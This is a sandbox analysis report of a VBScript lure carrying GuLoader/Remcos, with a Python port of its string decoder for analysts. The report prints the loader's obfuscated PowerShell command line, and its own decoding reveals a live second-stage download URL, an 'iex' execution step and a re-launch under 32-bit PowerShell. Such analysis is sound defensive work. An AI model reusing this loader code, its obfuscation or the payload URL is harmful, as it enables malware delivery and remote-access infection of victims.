Windows Analysis Report
TAS_#U63a1#U8cfc#U8a02#U55ae.vbs (the sandbox escapes non-ASCII filename characters as #Uxxxx; U+63A1 U+8CFC U+8A02 U+55AE is 採購訂單, Chinese for "purchase order", so the lure was named TAS_採購訂單.vbs)
Overview
General Information
Detection: GuLoader, Remcos
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%
Signatures
Malicious sample detected (through community Yara rule)
VBScript performs obfuscated calls to suspicious functions
Yara detected Remcos RAT
Antivirus detection for URL or domain
Yara detected GuLoader
Maps a DLL or memory area into another process
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Very long command line found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Found suspicious powershell code related to unpacking or dynamic code loading
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Classification
Process Tree
- System is w10x64
- wscript.exe (PID: 7492 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TAS_#U63a1#U8cfc#U8a02#U55ae.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
  - powershell.exe (PID: 7552 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "function Event ([String]$chanc){$Nonantici = 8;For($Flodblgern=7; $Flodblgern -lt $chanc.Length-1; $Flodblgern+=$Nonantici){$Ennuyant201=$Ennuyant201+$chanc.Substring($Flodblgern, 1)};$Ennuyant201;}$unsp=Event 'Articleh Gimpedt Alibietbirkensp Devotgs Repres:Sundhed/ Pronit/ BadstudpaagrebrSubduediSjlsrenvFamiliee Ideogr.BeredelgPseudocoSrmrkenoUndervigDekomprlHysteroeHndelse.EuphauscReformbokursgevmSommerf/KomparauOverfemcEufemis?programeHoughsixBalderspFalskmnoTriolerr StiffetDemelem=MajlisadagamavioSkifflewOpstrennNykbinglFaldgruoTranerpaZygomasdindeluk&MinierniTranslidKaosset=Thrummi1discoph5 ChlamyzHjerneabBitange1DesulfuCPilestrCKontraseIndurataWorseshi BygvkedQuantitrLysteliR OmkartABetelpa3 ArtistaadresseRRekvirenAktionsUPolyadeOGravero3ChimariG enlacevLoopertuKseskaf8VermuttBWrongdo0Askefllr ReproabTroldkrjTtelsesS MonadiKEnforcea Teodol ';$Ennuyant20101=Event 'IlluminiSimarubeLynchpixPretext ';$Under= $Ennuyant20101;$Miljomr = Event 'Tariffi\NontragsTilkaldyConcarnsTzimmesw SupermoAmanuenwDartspi6Supplem4Cyrtome\AnhemitWDiskretiDuettern MennesdGrftekaoMiscalcw Arpeggs AgerstPcoronetoPseudoawFrdiggreCytologrGgemmenSenterech DkfjereHjnelselSchemell Cowedl\Larvariv Rosett1Arabesk.Samlegl0forlags\Irreprop DedikaoUoverkowKabeltoeBankbetr KontrasCykelklhSalgssueSlhundelHazelnulAdelskr. ComporeKarolaaxPerridieRecepta '; . ($Ennuyant20101) (Event 'Acalypt$vgtstngPRaadmndrSystemuoSaaningc MelloweLnningsnIndgrebtBetrykku Slubbe2Sebkhas=Bjrnekl$PjatteheMadagasnSkrigeuvGalabiy:SukredewInblowiiAndenbenForelbid DummysiOpgavetrUerkend ') ; & ($Ennuyant20101) (Event 'Sakerst$ SemipuMCoatersiGaggerylLonglicjEtiskdjoAcerbicmTilstnir Irides= Ubeskr$StrobilPSnarligrVitalizocoxyfokcPisksame ForcibnCushiont BjergeuTrlsdeb2 Feltln+Amalies$svkkelsMDommesgiUdslynglChastacjModernioDifferemSerotinr Foregg ') ; . ($Ennuyant20101) (Event 'Avenuer$ApterinBDiffererTabeladiKostensdHovedsygSpionkaeControlmNonrevoa UnrecksHelmeddtRentvis Metanti=Strands Calpacs(Citrone(RekursbgAbsencewKrympnim NonreviOverbet Provokaw Vagarii Spdbrnn Uigenn3Stridsm2Heptane_kauryomp Bruttor AnkermoIndstrecRiveraieSudebohsOilfishsDdbolde Silgree- TietolF Saynet GitterP RkenerrPetioleoCartelicLdigtpae skallesOverwagsUnperpeI Shabrad Synste=udsagns$Dgninst{TrappegPFabulisIReelensDBarberm}Omraade) Husalf.WirestiCTonlsluoDaniellmHalitusmKlagebeaAdventsnadmissidReststjLOptimisiSennesbnSyntakseSnekk
    (the powershell.exe command line is cut off at this point in the extracted report)
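Decoding the command line above: the `Event` function keeps only every eighth character of its argument, starting at offset 7 and stopping one short of the end (PowerShell evaluates `$Flodblgern -lt $chanc.Length-1` as `-lt ($chanc.Length - 1)`, so the trailing space that closes every literal is dropped). The other seven characters of each group are filler. Run over the five complete literals in the process tree it yields, in order: `$unsp = https://drive.google.com/uc?export=download&id=15zb1CCeaidrRA3aRnUO3Gvu8B0rbjSKa` (the second-stage download), `$Ennuyant20101 = iex`, `$Miljomr = \syswow64\WindowsPowerShell\v1.0\powershell.exe`, then two statements executed through `iex`: `$Procentu2=$env:windir` and `$Miljomr=$Procentu2+$Miljomr`, which assemble the path of the 32-bit PowerShell host. The last literal is cut off on the page and cannot be recovered in full; the fragments that do decode (`gwmi win32_process`, `ProcessId=${PID}`) show the script reading its own command line, presumably to re-launch under the 32-bit PowerShell whose path it has just built. The Python port of `Event` below is an added example written for this page, not code from the report or from the sample; the literals are copied from the command line above, and the `windir` value given to `relaunch_path` is a constructed stand-in for `$env:windir`.

```python
"""Port of the `Event` string deobfuscation used by the PowerShell stage in
the process tree above, applied to the literals that stage was given.

Scheme: each payload character is preceded by seven characters of filler
(dictionary-word fragments), so the real string is every 8th character
starting at offset 7.
"""
import re

STEP = 8    # the script's $Nonantici
START = 7   # the initial $Flodblgern


def event(chanc: str) -> str:
    """Python equivalent of `function Event ([String]$chanc)`.

    PowerShell parses `$Flodblgern -lt $chanc.Length-1` as
    `$Flodblgern -lt ($chanc.Length - 1)`, so the final character of the
    input (a trailing space in every literal of this sample) is never
    copied; range() below reproduces that bound exactly.
    """
    return "".join(chanc[i] for i in range(START, len(chanc) - 1, STEP))


# Literals copied from the powershell.exe command line above, in evaluation
# order (filler and payload exactly as printed in the process tree).
OBFUSCATED = {
    "$unsp": "Articleh Gimpedt Alibietbirkensp Devotgs Repres:Sundhed/ Pronit/ BadstudpaagrebrSubduediSjlsrenvFamiliee Ideogr.BeredelgPseudocoSrmrkenoUndervigDekomprlHysteroeHndelse.EuphauscReformbokursgevmSommerf/KomparauOverfemcEufemis?programeHoughsixBalderspFalskmnoTriolerr StiffetDemelem=MajlisadagamavioSkifflewOpstrennNykbinglFaldgruoTranerpaZygomasdindeluk&MinierniTranslidKaosset=Thrummi1discoph5 ChlamyzHjerneabBitange1DesulfuCPilestrCKontraseIndurataWorseshi BygvkedQuantitrLysteliR OmkartABetelpa3 ArtistaadresseRRekvirenAktionsUPolyadeOGravero3ChimariG enlacevLoopertuKseskaf8VermuttBWrongdo0Askefllr ReproabTroldkrjTtelsesS MonadiKEnforcea Teodol ",
    "$Ennuyant20101": "IlluminiSimarubeLynchpixPretext ",
    "$Miljomr": r"Tariffi\NontragsTilkaldyConcarnsTzimmesw SupermoAmanuenwDartspi6Supplem4Cyrtome\AnhemitWDiskretiDuettern MennesdGrftekaoMiscalcw Arpeggs AgerstPcoronetoPseudoawFrdiggreCytologrGgemmenSenterech DkfjereHjnelselSchemell Cowedl\Larvariv Rosett1Arabesk.Samlegl0forlags\Irreprop DedikaoUoverkowKabeltoeBankbetr KontrasCykelklhSalgssueSlhundelHazelnulAdelskr. ComporeKarolaaxPerridieRecepta ",
    "iex #1": "Acalypt$vgtstngPRaadmndrSystemuoSaaningc MelloweLnningsnIndgrebtBetrykku Slubbe2Sebkhas=Bjrnekl$PjatteheMadagasnSkrigeuvGalabiy:SukredewInblowiiAndenbenForelbid DummysiOpgavetrUerkend ",
    "iex #2": "Sakerst$ SemipuMCoatersiGaggerylLonglicjEtiskdjoAcerbicmTilstnir Irides= Ubeskr$StrobilPSnarligrVitalizocoxyfokcPisksame ForcibnCushiont BjergeuTrlsdeb2 Feltln+Amalies$svkkelsMDommesgiUdslynglChastacjModernioDifferemSerotinr Foregg ",
}


def decode_all() -> dict:
    """Decode every literal. Keys name the variable the result is assigned
    to, or the statement that is handed to `iex` (`$Ennuyant20101`)."""
    return {name: event(text) for name, text in OBFUSCATED.items()}


def extract_event_literals(cmdline: str) -> list:
    """Pull every `Event '<literal>'` argument out of a command line so the
    decoder can be run over a fresh sample (EDR telemetry, another sandbox
    report) without hand-copying the strings. The function definition
    `function Event ([String]$chanc)` has no quoted argument and is skipped."""
    return re.findall(r"Event\s+'([^']*)'", cmdline)


def relaunch_path(decoded: dict, windir: str = r"C:\Windows") -> str:
    """Replay the two iex'd statements (`$Procentu2=$env:windir` and
    `$Miljomr=$Procentu2+$Miljomr`) to obtain the 32-bit PowerShell path
    the loader assembles. `windir` is a constructed value standing in for
    the sandbox's %windir%."""
    return windir + decoded["$Miljomr"]


if __name__ == "__main__":
    for name, value in decode_all().items():
        print(f"{name:16} -> {value}")
    print("relaunch host    ->", relaunch_path(decode_all()))
```

The decoder is a faithful port rather than a generic "take every Nth character" helper: the off-by-one bound is what makes the trailing filler space disappear, and a decoder that ignored it would leave a stray space at the end of the download URL and the executable path.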